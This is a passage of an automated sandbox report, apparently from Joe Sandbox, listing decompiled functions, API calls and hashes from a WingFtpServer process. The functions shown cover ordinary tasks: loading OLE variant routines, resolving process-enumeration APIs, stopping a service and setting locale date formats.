                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                  • Opcode ID: 658d5b0c8f2c77005d194bc675af7b6ed774b10bf61b56a75767fd631bf2e344
                                                                                                                                                                                                  • Instruction ID: 5dd918449bc8eccc293be0283b8cb26b3034b43d20ac40935b115f94e1c6113a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 658d5b0c8f2c77005d194bc675af7b6ed774b10bf61b56a75767fd631bf2e344
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAD0A7E1B2430027E20492988C41B67339C9B84700F10452DB784CB3C0FE7D580992AF
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AD01B0 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 289 3ad01b0-3ad03a7 GetModuleHandleW call 3ad0184 * 22
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E03AD01B0() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x3bd895c = E03AD0184("VariantChangeTypeEx", E03ACFBA0, _t91);
				 *0x3bd8960 = E03AD0184("VarNeg", E03ACFBE8, _t91);
				 *0x3bd8964 = E03AD0184("VarNot", E03ACFBE8, _t91);
				 *0x3bd8968 = E03AD0184("VarAdd", E03ACFBF4, _t91);
				 *0x3bd896c = E03AD0184("VarSub", E03ACFBF4, _t91);
				 *0x3bd8970 = E03AD0184("VarMul", E03ACFBF4, _t91);
				 *0x3bd8974 = E03AD0184("VarDiv", E03ACFBF4, _t91);
				 *0x3bd8978 = E03AD0184("VarIdiv", E03ACFBF4, _t91);
				 *0x3bd897c = E03AD0184("VarMod", E03ACFBF4, _t91);
				 *0x3bd8980 = E03AD0184("VarAnd", E03ACFBF4, _t91);
				 *0x3bd8984 = E03AD0184("VarOr", E03ACFBF4, _t91);
				 *0x3bd8988 = E03AD0184("VarXor", E03ACFBF4, _t91);
				 *0x3bd898c = E03AD0184("VarCmp", E03ACFC00, _t91);
				 *0x3bd8990 = E03AD0184("VarI4FromStr", E03ACFC0C, _t91);
				 *0x3bd8994 = E03AD0184("VarR4FromStr", E03ACFC78, _t91);
				 *0x3bd8998 = E03AD0184("VarR8FromStr", E03ACFCE8, _t91);
				 *0x3bd899c = E03AD0184("VarDateFromStr", E03ACFD58, _t91);
				 *0x3bd89a0 = E03AD0184("VarCyFromStr", E03ACFDC8, _t91);
				 *0x3bd89a4 = E03AD0184("VarBoolFromStr", E03ACFE38, _t91);
				 *0x3bd89a8 = E03AD0184("VarBstrFromCy", E03ACFEB8, _t91);
				 *0x3bd89ac = E03AD0184("VarBstrFromDate", E03ACFF60, _t91);
				_t46 = E03AD0184("VarBstrFromBool", E03AD00F0, _t91);
				 *0x3bd89b0 = _t46;
				return _t46;
			}






                                                                                                                                                                                                  0x03ad01be
                                                                                                                                                                                                  0x03ad01d2
                                                                                                                                                                                                  0x03ad01e8
                                                                                                                                                                                                  0x03ad01fe
                                                                                                                                                                                                  0x03ad0214
                                                                                                                                                                                                  0x03ad022a
                                                                                                                                                                                                  0x03ad0240
                                                                                                                                                                                                  0x03ad0256
                                                                                                                                                                                                  0x03ad026c
                                                                                                                                                                                                  0x03ad0282
                                                                                                                                                                                                  0x03ad0298
                                                                                                                                                                                                  0x03ad02ae
                                                                                                                                                                                                  0x03ad02c4
                                                                                                                                                                                                  0x03ad02da
                                                                                                                                                                                                  0x03ad02f0
                                                                                                                                                                                                  0x03ad0306
                                                                                                                                                                                                  0x03ad031c
                                                                                                                                                                                                  0x03ad0332
                                                                                                                                                                                                  0x03ad0348
                                                                                                                                                                                                  0x03ad035e
                                                                                                                                                                                                  0x03ad0374
                                                                                                                                                                                                  0x03ad038a
                                                                                                                                                                                                  0x03ad039a
                                                                                                                                                                                                  0x03ad03a0
                                                                                                                                                                                                  0x03ad03a7

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 03AD01B9
                                                                                                                                                                                                    • Part of subcall function 03AD0184: GetProcAddress.KERNEL32(00000000), ref: 03AD019D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                                                                                                                  • Opcode ID: c89030b4ee3481c341bf01c1c9e6fbf6ab71efa7a4a7782efa7dce760459f695
                                                                                                                                                                                                  • Instruction ID: 979522a6feed8006b98e89d032786b0ed69dc04604e57815e0862a65efc931b2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c89030b4ee3481c341bf01c1c9e6fbf6ab71efa7a4a7782efa7dce760459f695
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 584180A560638C7F5244FB6D761082BB7D9D788206B64511FB447CFB08EF30AD42873A
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AB2558 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 119COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E03AB2558() {
				void* __ebx;
				void* _t45;

				if( *0x3bd6668 == 0) {
					 *0x3bd6668 = GetModuleHandleW(L"kernel32.dll");
					if( *0x3bd6668 != 0) {
						 *0x3bd666c = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"CreateToolhelp32Snapshot");
						 *0x3bd6670 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Heap32ListFirst");
						 *0x3bd6674 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Heap32ListNext");
						 *0x3bd6678 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Heap32First");
						 *0x3bd667c = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Heap32Next");
						 *0x3bd6680 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Toolhelp32ReadProcessMemory");
						 *0x3bd668c = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Process32First");
						 *0x3bd6690 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Process32Next");
						 *0x3bd6694 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Process32FirstW");
						 *0x3bd6698 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Process32NextW");
						 *0x3bd6684 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Process32FirstW");
						 *0x3bd6688 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Process32NextW");
						 *0x3bd669c = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Thread32First");
						 *0x3bd66a0 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Thread32Next");
						 *0x3bd66ac = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Module32First");
						 *0x3bd66b0 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Module32Next");
						 *0x3bd66b4 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Module32FirstW");
						 *0x3bd66b8 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Module32NextW");
						 *0x3bd66a4 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Module32FirstW");
						 *0x3bd66a8 = E03AB222C(0x3bd6668, _t45,  *0x3bd6668, L"Module32NextW");
					}
				}
				if( *0x3bd6668 == 0 ||  *0x3bd666c == 0) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                                  0x03ab2561
                                                                                                                                                                                                  0x03ab2571
                                                                                                                                                                                                  0x03ab2576
                                                                                                                                                                                                  0x03ab2589
                                                                                                                                                                                                  0x03ab259b
                                                                                                                                                                                                  0x03ab25ad
                                                                                                                                                                                                  0x03ab25bf
                                                                                                                                                                                                  0x03ab25d1
                                                                                                                                                                                                  0x03ab25e3
                                                                                                                                                                                                  0x03ab25f5
                                                                                                                                                                                                  0x03ab2607
                                                                                                                                                                                                  0x03ab2619
                                                                                                                                                                                                  0x03ab262b
                                                                                                                                                                                                  0x03ab263d
                                                                                                                                                                                                  0x03ab264f
                                                                                                                                                                                                  0x03ab2661
                                                                                                                                                                                                  0x03ab2673
                                                                                                                                                                                                  0x03ab2685
                                                                                                                                                                                                  0x03ab2697
                                                                                                                                                                                                  0x03ab26a9
                                                                                                                                                                                                  0x03ab26bb
                                                                                                                                                                                                  0x03ab26cd
                                                                                                                                                                                                  0x03ab26df
                                                                                                                                                                                                  0x03ab26df
                                                                                                                                                                                                  0x03ab2576
                                                                                                                                                                                                  0x03ab26e7
                                                                                                                                                                                                  0x03ab26f5
                                                                                                                                                                                                  0x03ab26f6
                                                                                                                                                                                                  0x03ab26f9
                                                                                                                                                                                                  0x03ab26f9

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000002,03AB2927,?,00000000,03BC4E18,00000000,03BC4F44), ref: 03AB256C
                                                                                                                                                                                                    • Part of subcall function 03AB222C: GetProcAddress.KERNEL32(?,?), ref: 03AB2256
                                                                                                                                                                                                    • Part of subcall function 03AB222C: GetProcAddress.KERNEL32(?,00000000), ref: 03AB228F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                  • API String ID: 667068680-597814768
                                                                                                                                                                                                  • Opcode ID: 0757fb03d6c11e2c8d7d7ff1be418743c3c5d983ff14222427d499f900cca3fa
                                                                                                                                                                                                  • Instruction ID: 3603e3e9de39e85965601d4255a23d7a984f942a79a8c93ef01edca78e084c8a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0757fb03d6c11e2c8d7d7ff1be418743c3c5d983ff14222427d499f900cca3fa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6141F5B4A01314AFDB09EFF8EA95BA937BCFB06204B410E67A410CF70AE2759800CB15
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03BC4A7C Relevance: 16.6, APIs: 11, Instructions: 84servicesleepwindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                                                  			E03BC4A7C(void* __ebx, intOrPtr _a4) {
				char _v5;
				void* _v12;
				void* _v16;
				intOrPtr _v40;
				struct _SERVICE_STATUS _v44;
				char _v72;
				MSG* _t42;
				intOrPtr _t45;
				void* _t47;
				void* _t48;
				intOrPtr _t49;

				_t47 = _t48;
				_t49 = _t48 + 0xffffffbc;
				E03AA9D00(_a4);
				_t42 =  &_v72;
				_push(_t47);
				_push(0x3bc4b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49;
				_v16 = OpenSCManagerW(0, 0, 1);
				_v12 = OpenServiceW(_v16, E03AAA8E4(_a4), 0x34);
				_push(_t47);
				_push(0x3bc4b65);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49;
				if(ControlService(_v12, 1,  &_v44) == 0) {
					_v5 = 0;
					L11:
					_pop(_t45);
					 *[fs:eax] = _t45;
					_push(E03BC4B6C);
					CloseServiceHandle(_v12);
					return CloseServiceHandle(_v16);
				}
				Sleep(0x3e8);
				while(QueryServiceStatus(_v12,  &_v44) != 0) {
					while(PeekMessageW(_t42, 0, 0, 0, 1) != 0) {
						TranslateMessage(_t42);
						DispatchMessageW(_t42);
					}
					if(_v40 != 3) {
						break;
					}
					Sleep(0x3e8);
				}
				if(_v40 != 1) {
					_v5 = 0;
				} else {
					_v5 = 1;
				}
				goto L11;
			}














                                                                                                                                                                                                  0x03bc4a7d
                                                                                                                                                                                                  0x03bc4a7f
                                                                                                                                                                                                  0x03bc4a86
                                                                                                                                                                                                  0x03bc4a8b
                                                                                                                                                                                                  0x03bc4a90
                                                                                                                                                                                                  0x03bc4a91
                                                                                                                                                                                                  0x03bc4a96
                                                                                                                                                                                                  0x03bc4a99
                                                                                                                                                                                                  0x03bc4aa7
                                                                                                                                                                                                  0x03bc4abe
                                                                                                                                                                                                  0x03bc4ac3
                                                                                                                                                                                                  0x03bc4ac4
                                                                                                                                                                                                  0x03bc4ac9
                                                                                                                                                                                                  0x03bc4acc
                                                                                                                                                                                                  0x03bc4ae0
                                                                                                                                                                                                  0x03bc4b41
                                                                                                                                                                                                  0x03bc4b45
                                                                                                                                                                                                  0x03bc4b47
                                                                                                                                                                                                  0x03bc4b4a
                                                                                                                                                                                                  0x03bc4b4d
                                                                                                                                                                                                  0x03bc4b56
                                                                                                                                                                                                  0x03bc4b64
                                                                                                                                                                                                  0x03bc4b64
                                                                                                                                                                                                  0x03bc4ae7
                                                                                                                                                                                                  0x03bc4b1e
                                                                                                                                                                                                  0x03bc4afc
                                                                                                                                                                                                  0x03bc4af1
                                                                                                                                                                                                  0x03bc4af7
                                                                                                                                                                                                  0x03bc4af7
                                                                                                                                                                                                  0x03bc4b12
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03bc4b19
                                                                                                                                                                                                  0x03bc4b19
                                                                                                                                                                                                  0x03bc4b33
                                                                                                                                                                                                  0x03bc4b3b
                                                                                                                                                                                                  0x03bc4b35
                                                                                                                                                                                                  0x03bc4b35
                                                                                                                                                                                                  0x03bc4b35
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001,00000000,03BC4B82), ref: 03BC4AA2
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(?,00000000,00000034,00000000,00000000,00000001,00000000,03BC4B82), ref: 03BC4AB9
                                                                                                                                                                                                  • ControlService.ADVAPI32(?,00000001,?,00000000,03BC4B65,?,?,00000000,00000034,00000000,00000000,00000001,00000000,03BC4B82), ref: 03BC4AD9
                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,00000001,?,00000000,03BC4B65,?,?,00000000,00000034,00000000,00000000,00000001,00000000,03BC4B82), ref: 03BC4AE7
                                                                                                                                                                                                  • PeekMessageW.USER32 ref: 03BC4B05
                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000,00000001,?,?,?,00000000,00000000,00000000,00000001,?,?,000003E8), ref: 03BC4B19
                                                                                                                                                                                                  • QueryServiceStatus.ADVAPI32(?,?,000003E8,?,00000001,?,00000000,03BC4B65,?,?,00000000,00000034,00000000,00000000,00000001,00000000), ref: 03BC4B26
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?,03BC4B6C,00000000,03BC4B65,?,?,00000000,00000034,00000000,00000000,00000001,00000000,03BC4B82), ref: 03BC4B56
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?,?,03BC4B6C,00000000,03BC4B65,?,?,00000000,00000034,00000000,00000000,00000001,00000000,03BC4B82), ref: 03BC4B5F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandleOpenSleep$ControlManagerMessagePeekQueryStatus
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1780808657-0
                                                                                                                                                                                                  • Opcode ID: 417dc37e4d2bcbefd077f288b9bf763db5cf31ffe760936f95b90061b22a216a
                                                                                                                                                                                                  • Instruction ID: 6f9f1528fc551e1bc0a1792dd96744c135f8534d0f1aaa29ecc3cdaf47017fcc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 417dc37e4d2bcbefd077f288b9bf763db5cf31ffe760936f95b90061b22a216a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7821A974A54384BAEB21EBB5CD51FDDB7BCDB08704F4048A6F604EB282DB759640C634
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC57E8 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 216threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                                                  			E03AC57E8(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x3ac5acd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x3abbdd0; // 0x3abbdd4
				E03AAC264(_t151 + 0xbc, _t172);
				E03AC61F0(_t214, _t151, _t151, _t211, _t214, _t224);
				E03AC5EC4(_t214, _t151, _t151, _t211, _t214);
				E03AC5F80(_t214, _t151, _t151, _t211, _t214);
				E03AC5770(_t214, 0, 0x14,  &_v20);
				E03AA9FFC(_t151, _v20);
				E03AC5770(_t214, 0x3ac5ae8, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E03AC1148(0x3ac5ae8, 0, _t219);
				E03AC5770(_t214, 0x3ac5ae8, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E03AC1148(0x3ac5ae8, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E03AC57BC(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E03AC57BC(_t214, 0x2e, 0xe);
				E03AC5770(_t214, 0x3ac5ae8, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E03AC1148(0x3ac5ae8, 0, _t219);
				_t212 = E03AC57BC(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E03AC653C(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E03AA9FFC(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E03AC653C(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E03AA9FFC(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E03AC57BC(_t214, 0x3a, 0x1e);
				E03AC5770(_t214, 0x3ac5b3c, 0x28,  &_v44);
				E03AA9FFC(_t151 + 0x14, _v44);
				E03AC5770(_t214, 0x3ac5b50, 0x29,  &_v48);
				E03AA9FFC(_t151 + 0x18, _v48);
				E03AA9C1C( &_v12);
				E03AA9C1C( &_v16);
				E03AC5770(_t214, 0x3ac5ae8, 0x25,  &_v52);
				_t121 = E03AC1148(0x3ac5ae8, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E03AAA044( &_v8, 0x3ac5b74);
				} else {
					E03AAA044( &_v8, 0x3ac5b64);
				}
				E03AC5770(_t214, 0x3ac5ae8, 0x23,  &_v56);
				_t128 = E03AC1148(0x3ac5ae8, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E03AC5770(_t214, 0x3ac5ae8, 0x1005,  &_v60);
					if(E03AC1148(0x3ac5ae8, 0, _t221) != 0) {
						E03AAA044( &_v12, L"AMPM ");
					} else {
						E03AAA044( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E03AAABD4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E03AAABD4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E03AC57BC(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x3ac5ad4);
				return E03AA9C7C( &_v60, 0xe);
			}





























                                                                                                                                                                                                  0x03ac57e8
                                                                                                                                                                                                  0x03ac57e8
                                                                                                                                                                                                  0x03ac57e9
                                                                                                                                                                                                  0x03ac57eb
                                                                                                                                                                                                  0x03ac57f0
                                                                                                                                                                                                  0x03ac57f0
                                                                                                                                                                                                  0x03ac57f2
                                                                                                                                                                                                  0x03ac57f4
                                                                                                                                                                                                  0x03ac57f4
                                                                                                                                                                                                  0x03ac57f9
                                                                                                                                                                                                  0x03ac57fa
                                                                                                                                                                                                  0x03ac57fc
                                                                                                                                                                                                  0x03ac5800
                                                                                                                                                                                                  0x03ac5801
                                                                                                                                                                                                  0x03ac5806
                                                                                                                                                                                                  0x03ac5809
                                                                                                                                                                                                  0x03ac580f
                                                                                                                                                                                                  0x03ac5814
                                                                                                                                                                                                  0x03ac5816
                                                                                                                                                                                                  0x03ac581d
                                                                                                                                                                                                  0x03ac581d
                                                                                                                                                                                                  0x03ac5825
                                                                                                                                                                                                  0x03ac582b
                                                                                                                                                                                                  0x03ac5834
                                                                                                                                                                                                  0x03ac583d
                                                                                                                                                                                                  0x03ac5846
                                                                                                                                                                                                  0x03ac5858
                                                                                                                                                                                                  0x03ac5862
                                                                                                                                                                                                  0x03ac5877
                                                                                                                                                                                                  0x03ac5886
                                                                                                                                                                                                  0x03ac5899
                                                                                                                                                                                                  0x03ac58a8
                                                                                                                                                                                                  0x03ac58be
                                                                                                                                                                                                  0x03ac58d5
                                                                                                                                                                                                  0x03ac58ec
                                                                                                                                                                                                  0x03ac58fb
                                                                                                                                                                                                  0x03ac590e
                                                                                                                                                                                                  0x03ac5910
                                                                                                                                                                                                  0x03ac5914
                                                                                                                                                                                                  0x03ac5925
                                                                                                                                                                                                  0x03ac5930
                                                                                                                                                                                                  0x03ac5939
                                                                                                                                                                                                  0x03ac594a
                                                                                                                                                                                                  0x03ac5955
                                                                                                                                                                                                  0x03ac596a
                                                                                                                                                                                                  0x03ac597e
                                                                                                                                                                                                  0x03ac5989
                                                                                                                                                                                                  0x03ac599e
                                                                                                                                                                                                  0x03ac59a9
                                                                                                                                                                                                  0x03ac59b1
                                                                                                                                                                                                  0x03ac59b9
                                                                                                                                                                                                  0x03ac59ce
                                                                                                                                                                                                  0x03ac59d8
                                                                                                                                                                                                  0x03ac59dd
                                                                                                                                                                                                  0x03ac59df
                                                                                                                                                                                                  0x03ac59f8
                                                                                                                                                                                                  0x03ac59e1
                                                                                                                                                                                                  0x03ac59e9
                                                                                                                                                                                                  0x03ac59e9
                                                                                                                                                                                                  0x03ac5a0d
                                                                                                                                                                                                  0x03ac5a17
                                                                                                                                                                                                  0x03ac5a1c
                                                                                                                                                                                                  0x03ac5a1e
